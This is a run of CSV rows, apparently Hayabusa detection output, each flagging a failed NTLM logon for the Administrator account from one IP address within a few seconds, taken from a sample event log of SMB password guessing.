+2016-09-20 01:51:36.751 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xiooSdP5eib8PUE3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.794 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: s6nQ2jp9IGYnGeyD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.839 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ejMtyR5QNdJFhw1W | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.873 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: e50kO0aVhfw5np5T | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.913 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 176XyLw6IhEI6NuD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.956 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KXCzCSSFvpbWNJFd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.993 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XhHRuZYlH8hekaKc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:37.026 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZGIUBFRMQ3OBbOA0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:37.077 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: R7CTT5g1w58eRRlS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:37.117 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JmVccmad66uOK9ox | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:37.163 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: t1jlT6kEcs14dcNZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:37.209 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rBty5jOGkkZSZEyD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:37.245 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0Ci7YUsO5MtFkDSW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:37.347 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 12JToliq9mmAuMTQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:37.381 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lw9AgAvBGWoXBlim | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:37.418 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ReGDyvRpGknAKqqB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:37.469 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6mdUn8na4asRfpJP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:37.528 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b7Wm5p4HnNCbkyh2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:37.585 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MQZwerVd6E08X8Ou | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:37.625 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dbDjtLKoX5Q77bn5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:37.669 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O7BNKHiPjzJKCaDk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:37.714 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HHqBI8bzZn5VO9gq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:37.757 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Xz2ZO3b3QSh6Rdqt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:37.797 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IEfdhrwbTfCpCXKC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:37.844 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kc0LuQzAmQTIF1X3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:37.896 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WMZ70YmzpVp2h8mY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:37.945 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FFVr3Amq6mA3umiu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:37.985 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hnN15vqZcww8pqTK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.027 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sSuMRF1txQ9g2Mwi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.073 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tUuapChhs4CGO1cS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.119 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dIMr0hjIkwD8AaEG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.173 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8ww9HMQX0cqmolYQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.210 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XJRRZ5e9lARVZDar | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.260 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VvUzVoSLqFPAXSWE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.304 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SMMgPu1VJIjAWPDW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.337 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I1JjIa4nOKDTLuAD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.377 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0J0GJIm1UUXHH9QJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.419 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YmVX3xIz0hrQFvPr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.470 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nv4tKFEmHjiXkVDI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.500 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: esdHHJl9LBek9pIo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.545 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MWofwwLjwiyBk39P | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.589 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dvsHFZe7Z1uJ9Dkv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.629 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8aDdgwvb1zsZF79k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.668 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AQUb6CnMUtyrMNhF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.701 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KP5OxHPsbLHnIUBE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.744 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ysg903vYFhQHYvFJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.793 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IySarHtsTvwSP56H | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.828 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GnUy8tbCIAVnmhDg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.863 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bfBtc4MnMtPG6MpC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.901 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 37b8MGIHY8QwXf9K | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.945 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eDuaWikplDmJNmIE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.989 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0kSSoAYJILHCPI7K | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:39.023 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: L9ikrtTGcZYU1556 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:39.064 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ypyd6SagvUXQHhtZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:39.100 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QWS37lIJ3Q6ghgMs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:39.149 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H211KmFImpBRwTGW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:39.193 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 64tO5iBehXQcNc49 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:39.236 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xvxDngRj3j5TAwST | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:39.281 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O8VYRjMnxDgUTWYf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:39.331 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EhWphTesbUf0hwi1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:39.385 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MO8VRRVANxIkDzEX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:39.429 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ziSXANiDAf7LRFz5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:39.527 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: g0CvYYtyEcU2riBX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:39.576 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tPg2LKgWMeM0Oqo0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:39.604 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dbzL9T2d4RdeCz4q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:39.653 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PeEfbWpoipfYtOKv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:39.685 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RKJW1vSrIAbRTzyB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:39.730 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aU4G8NBru22Vc4Cl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:39.768 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sacBcqxV97FUihrd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:39.821 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 41Ms0lEMeT0jYxYj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:39.859 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AkQWVEHGM1NxowR0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:39.906 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4qKqRY7L2IQRoU57 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:39.954 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eMIkvwbvqc9V6CFs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.001 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PehzjCnK42ZPUE7e | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
